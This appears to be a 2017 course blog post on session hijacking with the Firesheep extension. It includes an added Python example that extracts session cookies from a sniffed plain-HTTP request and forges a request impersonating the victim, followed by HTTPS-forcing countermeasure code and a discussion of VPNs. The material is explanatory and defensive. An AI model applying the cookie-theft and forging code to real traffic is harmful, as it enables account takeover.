Thursday, 14 December 2017

SESSION HIJACKING USING FIRESHEEP




Week Five ↓

Many websites use Secure Sockets Layer (SSL, today TLS) encryption, indicated by ‘https://’, only while a user submits login credentials; the data exchanged after login is sent over plain HTTP (Krebs, 2010). These websites identify a logged-in session with a cookie, and the browser attaches that cookie, unencrypted, to every post-login request. An eavesdropper sniffing the network can read the cookie out of the Cookie header and build a forged HTTP request that carries it; the server cannot tell the forged request from the victim’s own, so the attacker gains access to the victim’s account. In 2010 Eric Butler released a tool called “Firesheep” that allows “hackers to eavesdrop on unencrypted wireless networks and steal the sessions of other users who are logged on to popular websites” (Chapple, 2011). With this Firefox extension, a malicious user on the same open wireless network can take over other users’ sessions. Because it is a Firefox extension, Firesheep runs on the major desktop operating systems.
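The attack described above, as an added example that is not part of the original post or of Firesheep itself: a sniffed plaintext HTTP request (constructed here as a byte string) is parsed, the session cookie is lifted from its Cookie header, and a forged request to the same host is built around the stolen cookie. The host www.example.com, the path /account and the cookie name sessionid are assumptions for illustration.

```python
"""Added example: turning a sniffed plain-HTTP request into a hijacked session.

Firesheep read requests like this off the wireless network with libpcap; here the
captured request is a constructed sample so the example runs offline.
"""
from http.cookies import SimpleCookie

# Constructed sample of a post-login request as it appears on the wire over plain
# HTTP. Because there is no TLS, the session cookie travels in the clear.
CAPTURED_REQUEST = (
    b"GET /home HTTP/1.1\r\n"
    b"Host: www.example.com\r\n"
    b"User-Agent: Mozilla/5.0\r\n"
    b"Cookie: sessionid=a1b2c3d4e5f6; theme=dark\r\n"
    b"\r\n"
)

# Cookie names that commonly carry a session identifier (assumed list).
SESSION_COOKIE_NAMES = {"sessionid", "PHPSESSID", "JSESSIONID"}


def parse_request(raw: bytes):
    """Split a raw HTTP/1.1 request into (method, path, headers dict)."""
    head, _, _body = raw.partition(b"\r\n\r\n")
    lines = head.decode("iso-8859-1").split("\r\n")
    method, path, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, path, headers


def extract_session_cookies(raw: bytes) -> dict:
    """Return {name: value} for the cookies that look like session identifiers."""
    _, _, headers = parse_request(raw)
    jar = SimpleCookie()
    jar.load(headers.get("cookie", ""))
    return {name: morsel.value for name, morsel in jar.items()
            if name in SESSION_COOKIE_NAMES}


def build_hijacked_request(raw: bytes, path: str = "/account") -> bytes:
    """Forge a request to the same host that presents only the stolen session cookie.

    The server sees a valid session identifier and serves the victim's account;
    nothing in the request proves who is sending it.
    """
    _, _, headers = parse_request(raw)
    stolen = extract_session_cookies(raw)
    cookie_header = "; ".join(f"{k}={v}" for k, v in stolen.items())
    return (
        f"GET {path} HTTP/1.1\r\n"
        f"Host: {headers['host']}\r\n"
        f"Cookie: {cookie_header}\r\n"
        "\r\n"
    ).encode()


if __name__ == "__main__":
    print("stolen:", extract_session_cookies(CAPTURED_REQUEST))
    print(build_hijacked_request(CAPTURED_REQUEST).decode())
```

The forged request is what a Firesheep-style tool sends on the attacker's behalf; no password is needed, because the site authenticates every post-login request by the cookie alone.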

Countermeasures

“The most effective solution to this is end-to-end encryption, known on the web as HTTPS or SSL” (Krebs, 2010). Two widely used Firefox add-ons that enforce HTTPS while browsing on public networks are described below. They make the browser request specific websites over HTTPS so that all traffic, including post-login traffic, is encrypted (Krebs, 2010). Note that an add-on can only force HTTPS on sites that actually offer it; a site with no HTTPS endpoint remains exposed.

  • HTTPS Everywhere. “This extension encrypts communication with a number of major websites by default” (Kumar, 2010). Users can also add other sites to its list of sites forced to HTTPS.

  • Force-TLS. This add-on ships with no websites listed, but lets the user add websites to its list; every listed site is then requested over HTTPS only.


Also, tunneling your connections through a VPN encrypts your traffic and hides it from eavesdroppers on the local network (Chapple, 2011). Keep in mind that a VPN only protects the path between you and the VPN endpoint: past that point, traffic to a plain-HTTP site is again sent in the clear.
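The rewrite logic behind the two add-ons above, as an added example that is not the code of HTTPS Everywhere or Force-TLS: HTTPS Everywhere shipped regex rulesets mapping http:// URLs of known sites to their https:// equivalents, with exclusions for paths that broke over HTTPS, while Force-TLS kept a plain list of hostnames the user added by hand. The rules, hostnames (example.com, bank.example) and the /legacy/ exclusion below are constructed for this example.

```python
"""Added example: HTTPS-forcing rewrite rules in the style of HTTPS Everywhere
(regex from->to rules with exclusions) and Force-TLS (a user-supplied host list).
All sites and rules here are constructed; none is an official ruleset.
"""
import re
from urllib.parse import urlsplit, urlunsplit

# HTTPS Everywhere style rules: first matching rule wins, unless an exclusion
# pattern matches the URL (used for paths that are broken over HTTPS).
RULES = [
    {
        "name": "Example",
        "from": r"^http://(www\.)?example\.com/",
        "to": r"https://www.example.com/",
        "exclusions": [r"^http://www\.example\.com/legacy/"],
    },
    {
        "name": "Social",
        "from": r"^http://(www\.)?social\.example/",
        "to": r"https://social.example/",
        "exclusions": [],
    },
]

# Force-TLS style list: bare hostnames the user added; no per-path rules.
FORCED_HOSTS = {"bank.example"}


def apply_rules(url: str, rules=RULES):
    """Rewrite url with the first applicable rule.

    Returns (new_url, rule_name); rule_name is None when nothing matched.
    """
    for rule in rules:
        if any(re.match(pattern, url) for pattern in rule["exclusions"]):
            continue
        new_url, count = re.subn(rule["from"], rule["to"], url, count=1)
        if count:
            return new_url, rule["name"]
    return url, None


def force_host(url: str, hosts=FORCED_HOSTS):
    """Upgrade the scheme to https when the host is on the forced list.

    Returns (new_url, forced) where forced tells whether a rewrite happened.
    """
    parts = urlsplit(url)
    if parts.scheme == "http" and parts.hostname in hosts:
        return urlunsplit(("https",) + tuple(parts[1:])), True
    return url, False


def upgrade(url: str) -> str:
    """Return the URL the browser should actually request.

    Rulesets are consulted first; the forced-host list is the fallback.
    An http:// URL that matches neither is left alone, which is exactly the
    case these add-ons cannot help with.
    """
    new_url, rule = apply_rules(url)
    if rule is not None:
        return new_url
    new_url, _forced = force_host(url)
    return new_url


if __name__ == "__main__":
    for candidate in ("http://example.com/inbox",
                      "http://www.example.com/legacy/old.html",
                      "http://bank.example/login?next=/home",
                      "http://other.example/"):
        print(f"{candidate} -> {upgrade(candidate)}")
```

The rewrite happens before the request leaves the browser, which is why it closes the Firesheep window: the session cookie is only ever sent inside a TLS connection. The last URL in the demo shows the limit of the approach, since a site with no rule and no HTTPS service is still requested in the clear.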

References

Krebs, B. (2010, October). ‘Firesheep: Baaaaad News for the Unwary’ Released. Retrieved from https://krebsonsecurity.com/2010/10/firesheep-baaaaad-news-for-the-unwary/
Kumar, M. (2010, November). HTTPS Everywhere: Another tool to protect from Firesheep. Retrieved from https://thehackernews.com/2010/12/https-everywhere-another-tool-to.html
Chapple, M. (2011, February). Firesheep, Fireshepherd, and Facebook: Understanding Session Hijacking. Retrieved from http://www.ciscopress.com/articles/article.asp?p=1680707&seqNum=2


Video Credit: Daniel Taschik. November 14, 2012
